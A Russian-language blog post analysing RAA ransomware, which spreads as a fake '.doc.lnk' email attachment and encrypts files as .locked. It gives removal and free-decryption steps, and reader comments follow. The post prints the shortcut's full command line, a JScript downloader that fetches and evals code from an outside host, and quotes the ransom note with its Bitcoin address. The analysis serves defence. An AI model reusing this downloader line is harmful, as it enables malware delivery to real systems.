Расшифровка файлов *.locked после вируса

Коротко:
Вирус-шифровальщик  файлов RAA распространяется через почту, шифрует
.doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и другие файлы. К зашифрованным файлам вирус добавляет расширение .locked.
Для расшифровки файлов требует денег. Расшифровать файлы самостоятельно можно самому с помощью этих действий.

Подробно:
Пришло сотруднику на почту письмо, в письме был вложен якобы вордовский документ «Для партнеров ТЕНДЕР.doc.lnk». Кстати, названия документов меняются, вирусопускатели используют для них разные имена.

По расширению *.lnk для мало-мальски грамотного человека сразу очевидно, что это ярлык, а не вордовский документ для тендера и открывать оное на своем компьютере чревато.

Но на такое фуфло часто ведутся невежи, как следствие- после «открытия документа» запускается процесс шифрования документов форматов .doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и других. К зашифрованным файлам добавляется расширение .locked.
Просто удалить расширение *.locked и нормально открыть зашифрованные файлы в ворде и экселе, например, невозможно- показывает белиберду. Файлы нужно сначала расшифровать.

Для шифрования вирус подключается по интернету к некоемому сайту и шифрует документы по алгоритму, указанному в свойствах ярлыка. Вот командная строка в этом «ярлыке-вирусе»:
%windir%\system32\cmd.exe /c REM.>op.js&echo var w=[«Msxml2.ServerXMLHTTP.6.0″,»GET»,»http://say-helloworld.com/src/gate.php?a»,»open»,»send»,»responseText»];var pp= new ActiveXObject(w[0]);pp[w[3]](w[1],w[2],false);pp[w[4]]();eval(pp[w[5]]);>op.js&op.js

Как видно, идет коннект на сайт http://say-helloworld.com и если заблокировать этот сайт на своем сервере, вирус ничего сделать не сможет.

Вирус сам себя называет «RAA», антивирус Аваст погоняет его как «JS:Downloader-DGA[Trj]»:

После шифрования вирус создает на рабочем столе документ «!!!README!!!qUhkZ.rtf» с таким содержанием:

——————————-
***ВНИМАНИЕ!***
Ваши файлы были зашифрованы вирусом RAA.
При шифровании был применен алгоритм AES-256, используемый для защиты информации, представляющей государственную тайну.
Это значит, что восстановить данные можно только купив ключ у нас.
Покупка ключа — простейшее дело.
Все, что вам надо:
1. Скинуть ваш ID C4B4C044-7463-4F07-A5AC-63A145632B83 на почтовый адрес raa-consult1@keemail.me.
2. Тестово расшифровать несколько файлов для того, чтоб убедиться, что у нас действительно есть ключ.
3. Оплатить покупку Вашего ключа путем перевода на Bitcoin-адрес 1HkmHv1SHGGaxLSWD1abct1187kVoJUqav.
О том, как купить Bitcoin за рубли с любой карты — https://www.bestchange.ru/visa-mastercard-rur-to-bitcoin.html
4. Получить ключ и программу для расшифровки файлов.
5. Предпринять меры по предотвращению подобных ситуаций в дальнейшем.

Важно (1).
Не пытайтесь подобрать ключ, это бесполезно, и может уничтожить ваши данные окончательно.

Важно (2).
Если по указанному адресу (raa-consult1@keemail.me) вами не был получен ответ в течение 3х часов, вы можете воспользоваться для связи сервисом Bitmessage
(наш адрес — BM-2cVCd439eH5kTS9PzG4NxGUAtSCxLywsnv).
Детальнее о программе — https://bitmessage.org/wiki/Main_Page

Важно (3).
Мы НЕ МОЖЕМ хранить ваши ключи вечно. Все ключи, за которые не было выплачено вознаграждение, удаляются в течение недели с момента заражения.

README файлы расположены в корне каждого диска.

ВАШ ID — C4B4C044-7463-4F07-A5AC-63A145632B83
——————————-

Интересно,  что твари не лишены эстетических чувств- раскрасили текст-попрошайку цветными карандашами.

Еще умилил пункт 5: Предпринять меры по предотвращению подобных ситуаций в дальнейшем. Как благородно, ми-ми-ми-ми. Понятно, что подсознательно пареньки понимают, что занимаются нехорошими делами и как бы перекладывают вину на пострадавшего, мол, «ты сам дурак, будь впредь внимателен, а нам скажи спасибо за науку и вообще, не мы такие а жизнь такая».

Но пареньки-вирусописатели пусть тут не обольщаются: своими деяниями они активно минусуют себе карму. И не сейчас, но через 2-3 года, когда запас прочности истощится, награда таки найдет своих героев.

И тогда один из них попадет в поле зрения органов и отправится тренировать дряблую мускулатуру на лесоповалах Мордовии в компании с брутальными почитателями творчества Ивана Кучина, с которыми будет страшно мыться в душе. А другого во время кутежа с ворованными денежками на Цейлоне поймают в рабство тигры освобождения Тамил-Илама и заставят батрачить на выращивании риса с пытками отсутствия интернета и другими противоестественными действиями, о которых не при дамах. Может быть тогда пареньки задумаются, что нужно было не красть чужое, а податься в скрипачи, как советовал дядя Изя. Но это будет потом, а пока парни считают, что поймали бога за бороду и надоят счастья у простофиль.

Несмотря на вышеуказанную писульку, расшифровать документы *.locked можно самому и бесплатно:

1. Заблокировать на сервере предприятия сайт http://say-helloworld.com для избежания новых шифрований.
2. Скачать программы cureit, Kaspersky KVRT, Kaspersky rectordecryptor, Kaspersky rakhnidecryptor.
3. Отключить сеть интернета от компа.
4. Перезагрузиться в безопасном режиме.
5. Поискать вирусы программой cureit и KVRT.
6. Пройтись программой rectordecryptor.
7. Пройтись программой rakhnidecryptor.

Программа rakhnidecryptor подобрала ключ за 23 часа работы(ПК с cpu athlon x2 240, ddr2 2 Gb) и благополучно расшифровала файлы *.locked
С чем и поздравляю вымогателей:

UPD1
Судя по камментам, иногда с помощью указанной процедуры не удается расшифровать файлы. Ну не знаю, у меня все получилось. Могу только посоветовать точно выполнять инструкции: отключить ПК от интернета, вылечить вирус, запустить дешифровщик.

UPD2
У кого получилось расшифровать, напишите в камментах. А то создается впечатление, что только я нормально дешифровал.

Вам также может понравиться

About the Author: Александр

3 комментария

  1. Как вариант восстановить поврежденные файлы без дешифровки: ПКМ по локальному диску, где лежат поврежденные файлы — Свойства — вкладка Предыдущие версии — выбираете версию по дате (когда вируса еще не было), ПКМ по ней, открыть, ищете ваши файлики. По умолчанию диск С должен иметь подобные резервные копии, для других дисков не уверен, но их можно задать: Свойства системы — Дополнительные параметры — вкладка Защита системы. Современные крипторы трут Shadow Copy. Посему работать юзеры должны как минимум из ограниченной учетной записи.

  2. Якобы расшифровало, код подобрало и все файлы восстановило. Но все восстановленные файлы при открытии являются поврежденными и не открываются. Алексей, не знаете, что делать в таком случае?

  3. После того как файл зашифрован его расширение изменяется на locked. Затем вирус создаёт текстовой документ с именем UNLOCK_FILES_INSTRUCTIONS.txt, который содержит инструкцию по расшифровке зашифрованных файлов. Вирус-шифровальщик Locked активно использует тактику запугивания, давая жертве краткое описание алгоритма шифрования и показывая угрожающее сообщение на Рабочем столе. Он пытается таким образом заставить пользователя зараженного компьютера, не раздумывая, оплатить выкуп, для попытки вернуть свои файлы.

Добавить комментарий

Ваш адрес email не будет опубликован.